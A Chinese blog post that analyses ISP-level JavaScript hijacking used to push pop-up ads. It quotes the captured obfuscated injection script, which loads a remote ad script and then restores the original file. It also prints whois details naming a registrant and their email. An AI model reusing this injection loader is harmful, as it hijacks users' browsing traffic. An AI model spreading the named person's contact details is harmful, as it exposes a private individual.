某ISP近期的js劫持推送广告情况

最新推荐文章于 2024-07-22 22:35:58 发布
最新推荐文章于 2024-07-22 22:35:58 发布
阅读量2k 收藏
点赞数 1
分类专栏: 其他技术文摘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/robur/article/details/70202046
版权


近期访问很多网站,发现开始弹小广告了。

看了一下页面源代码,不用多说了,肯定是js劫持。

观察了这些网站,似乎没有共同点(比如使用某家的流量统计)。

哇,难道是针对不特定的js进行劫持?

赶紧抓了个包……好嘛,果然是。


(function(){try{var o='m-_-m',D=document;if(!D.getElementById(o)){var j='http://www.hikvision.com/cn/js/jQuery.md5.js',J=j+(~j.indexOf('?')?'&':'?')+new Date().getTime(),M='http://pc.quansj.cn/?cid=08',C=D.currentScript,H=D.getElementsByTagName('head')[0],N=function(s,i){var I=D.createElement('script');I.type='text/javascript';if(i)I.id=i;I.src=s;H.appendChild(I);};if(self==top){N(M,o);}if(!C){C=(function(){var S=D.scripts,l=S.length,i=0;for(;i<l;++i){if(S[i].src===j){return S[i];}}})();}C&&((C.defer||C.async)?N(J):D.write('<script src="'+J+'"><'+'/script>'));}}catch(e){}})();


whois查一下:

quansj.cn


联系人

周云鹏[whois反查]

联系邮箱

4943896@qq.com[whois反查]


其名下注册的域名还有(经确认与劫持广告推送有关):

517m.cn
ingtoys.cn


所以问题来了,这个姓周的是何许人也?

robur
关注
专栏目录
js屏蔽被http劫持的浮动广告实现方法
web前端开发教程htmlcssjs
11-25 534
网站经常在右下角弹出一个浮动广告,开始的时候以为只是浏览器的广告。 后来越来越多同事反映在家里不同浏览器也会出现广告。然后深入检查了下,发现网站竟然被劫持了。 然后百度了一大堆资料,什么http劫持、dns劫持、运营商劫持之类的,确定真的是中招了。看图: 真是偷梁换柱啊,被插入广告代码了。真是无良奸商,什么都做得出。 然并卵,最重要的解决办法是啥?然后把问题扔给了运维的同事。 最终结果是解决不...
js定时小广告推送
zhuhaomingoo的博客
10-26 983
cunchu                         var stroage = window.localStorage;                  $(".btn").on("click",function(){                 var now = new Date().getTime();                 stroage.set
JS劫持、DNS劫持与页面劫持跳转详解
最新发布
weixin_65409651的博客
07-22 868
JS劫持(JavaScript Hijacking)是一种通过恶意JavaScript代码控制或篡改网页内容的攻击手段。攻击者可以注入恶意代码,劫持用户的操作,窃取敏感信息或执行未授权的操作。DNS劫持(DNS Hijacking)是一种通过篡改域名系统(DNS)解析结果,将用户重定向到恶意网站的攻击手段。攻击者可以通过多种方式实现DNS劫持,包括修改DNS设置、攻击DNS服务器或通过恶意软件感染用户设备。
谁控制了我们的浏览器?
不羁的风的专栏--逆水行舟 不进则退
03-23 1335
本文遵从GPL协议,欢迎转载。  1、现象是什么?  大约从今年年初开始,很多人就发现,在浏览一些网站的时候,地址栏的url后面会被莫名其妙地加上“?curtime=xxxxxxxxxx”(x为数字),并且弹出广告窗口。很多人以为这是网站自己弹出的广告,也就没有在意。  我是属于很在意的那些人之一。  2、这是怎么回事?  经过测试和分析,我们发现,上述现象与使用何种浏览器无关(我们测试了各种流行
一次 ISP 劫持 HTTP 请求,我是这样发现的
08-13 787
编者按:Fundebug的客户通过分析我们提供的报警信息,定位了一个非常棘手的问题—ISP劫持http请求。他的分析过程非常有意思,同时也提醒我们,应该及时支持HTTPS...
我是这样发现ISP劫持HTTP请求的
dichu2296的博客
05-10 168
编者按:Fundebug的客户通过分析我们提供的报警信息,定位了一个非常棘手的问题—ISP劫持http请求。他的分析过程非常有意思,同时也提醒我们,应该及时支持HTTPS来保证站点安全。 原文:ISP劫持http请求 作者:Mr_Qi 本文版权归原作者Mr_Qi所有。 最近业务系统经常受到前端报错邮件 发现大量的ip为沈阳联通客户==>初步推断为运营商http劫持...
2022前端笔记
马航机长的博客
06-24 2207
tip:只记录本人记得不牢固的,或者有启发的点,新手建议多看书 1、原型链 实例对象的constructor也会指向构造函数 因为没有constructor属性会通过原型链找(容易忽略,是个小陷阱) function Person() {} var person = new Person(); console.log(person.constructor === Person); // true __proto__ 来自于 Object.prototype,更像是一个 getter/setter,使用 o
前端主流面试官必问超详细面试题(整理完以秃头)持续更新中
qq_43375584的博客
07-07 3976
CDN利用最靠近每位用户的服务器,更快、更可靠地将音乐、图片、视频、应用程序及其他文件发送给用户,来提供高性能、可扩展性及低成本的网络内容传递给用户。CDN的作用:(1)在性能方面,引入CDN的作用在于:(2)在安全方面,CDN有助于防御DDoS网络攻击:懒加载也叫做延迟加载、按需加载,指的是在长网页中延迟加载图片数据,是一种较好的网页性能优化的方式。 比如:在较长的网页中。如果有很多图片,所有的图片都被加载出来,而用户只能看到可视窗口的那一部分图片数据,这样就浪费了性能。如果我们使用图片的懒加载就可以解决
前端知识整理
u010599292的博客
03-17 674
1.let/var/const区别:a)只有var声明的变量存在变量提升;b)只有var允许重复声明,let和const在同一作用域不允许重复声明;c)let和const声明的变量在所声明的块级作用域中有效;d)const声明的是常量,必须赋值,const不变的是内存地址,let和var声明的是变量,可修改可不赋值。 2. 构造器模式是指构造器里的方法添加到构造器的原型中去,每个生成的实例都会继承这个方法,实现共享。 3. 单例设计模式是保证一个类仅有一个实例,并提供一个访问它的全局访问点;思路是新建对象时
前端面试还是要了解一下的网络协议相关滴!
weixin_29947843的博客
04-20 421
TCP、UDP的区别 (1)TCP是面向连接的;UDP是无连接的,即发送数据前不需要先建立链接 (2)TCP提供可靠的服务,通过TCP连接传输的数据无差错、不丢失、不重复,且按序到达,适合大数据量的交换;UDP尽最大努力交付,但不保证可靠 (3)TCP是面向字节流;UDP面向报文,并且网络出现拥塞不会使发送速率降低(会出现丢包,比如IP电话或者视频会议) (4)TCP只能端对端;UDP支持1对1 、1对多 (5)TCP的首部较大,为20字节;UDP为8字节 三次握手以及四次分手 在创建连接时, 1.客户端首
dns劫持!导致微信jssdk上挂广告
热门推荐
bestcjt的博客
12-13 1万+
这几天在做一个微信的投票网页,用的是vue+quasar UI框架,结果这几天发现偶尔上网页后有广告,如下图红色方框 以为自己的虚拟主机被攻击,但反复检查了都感觉没啥问题,然后怀疑是不是quasar这个框架有问题,因为我第一次用这个UI框架,是外国的,看着很正规的,也是反复查了,也没发现什么问题,也不是一直会出现,偶尔才出现一次,我就一直刷新,我先是截了正常时的网络访问状况
基于TCP的会话劫持-基于JS蠕虫的会话劫持-基于令牌和会话 ID 重置方法防止会话劫持
Martin-share的博客
02-03 827
基于TCP的会话劫持-基于JS蠕虫的会话劫持-基于令牌和会话 ID 重置方法防止会话劫持
关于DNS攻击那点事儿~ (DNS劫持 vs ISP劫持
st_andrews的博客
11-07 782
最近研究钓鱼安全问题,看到关于DNS的一些攻击,顺手研究了一下,发现各类文章说的是层出不穷,简单总结了一下,希望大家可以更好更容易的记住要点。 英文原文的话,我觉得这篇还不错,简单明了,一目了然:https://www.imperva.com/learn/application-security/dns-hijacking-redirection/ DNS攻击,主要分两种,一种称之为DNS 劫...
JavaScript函数劫持过滤页内广告
weixin_30765577的博客
03-01 76
终于又开始写Blog了。 摸了一下午模版,发现这个Blog的自由度还是相当大的,而且还支持语法加亮,美中不足的是回复框下面居然有一系列广告。于是想了个办法进行页面元素过滤,其原理就是劫持 document.write() 函数,对输出的内容进行过滤,只要是包含指定字符串的,一律封杀。 效果还比较理想,看图: 代码也很短,配合页首、页脚两段JS脚本,就可以完成任务。 页首Html...
本地自建服务器劫持验证,使用自建DNS服务器来防止ISP的DNS劫持
weixin_42512249的博客
07-29 1290
没节操的宽带服务商经常劫持DNS ,具体表现就是将不存在域名的出错网页劫持到他们的广告网站上,或者是ISP在网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应。我们遇到ISP劫持DNS应该怎么办,这里说下常见的解决DNS劫持的办法,我的亲身经历,终于找到应对劫持的办法了。首先自己搭建一个DNS缓存服务器,具体的搭建方法在这里:...
js 判断剪切板内容是否为text_查看软件是否劫持剪贴板,纯js实现复制到剪切板...
weixin_36127082的博客
01-14 281
打开一个程序,就弹出红包口令,这就是小程序劫持了剪切板。是小程序在获取用户信息的时候向剪切板写入红包口令了。纯js实现复制到剪切板:复制代码CopyDemo测试p1测试p2复制// 复制全文document.getElementById("copy-text-btn").onclick=function(){var ssrsss =document.getElementById("text-con...
网络推广恶意点击js_百度搜索推广碰到恶意点击该怎么解决
weixin_39631301的博客
12-21 413
百度搜索推广碰到恶意点击,的确是较为反感的一件事,从业百度竞价推广八年的老阳,今日来共享一下,碰到恶意点击我一般是怎么解决的,汇总下列了几个方面期待对你有一定的协助:1、学好剖析关键词,找到常常被恶意点击的关键词被恶意点击的关键词大部分是领域关键词,高总流量关键词。这种关键词是大家该关键关心的目标。开展否词,剖析开启你关键词的搜索关键词,如果是某一个独特的搜索关键词一天突显让你帐户导致很高点击与消...
说一下ISP tuning接下来在中国的发展情况
03-02
ISP tuning(图像处理器优化)是一种技术,旨在优化图像处理器的性能和效率,以提高图像处理的质量和速度。在中国,随着计算机视觉和人工智能等技术的快速发展,ISP tuning技术在图像处理领域中的应用也越来越广泛。 未来,在中国ISP tuning技术的应用将会得到更广泛的推广和应用。随着人工智能、物联网、智能制造等新兴技术的快速发展,图像处理技术在各行各业中的应用也越来越广泛。尤其是在互联网、移动互联网、智能手机等领域,ISP tuning技术的应用将会更加普及。 同时,中国也将继续加大对ISP tuning技术的研发投入,培养更多的技术人才。政府和企业将会提供更多的支持和帮助,以推动ISP tuning技术在中国的发展。 总之,ISP tuning技术在中国的发展前景非常广阔,未来将会得到更广泛的应用和推广。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值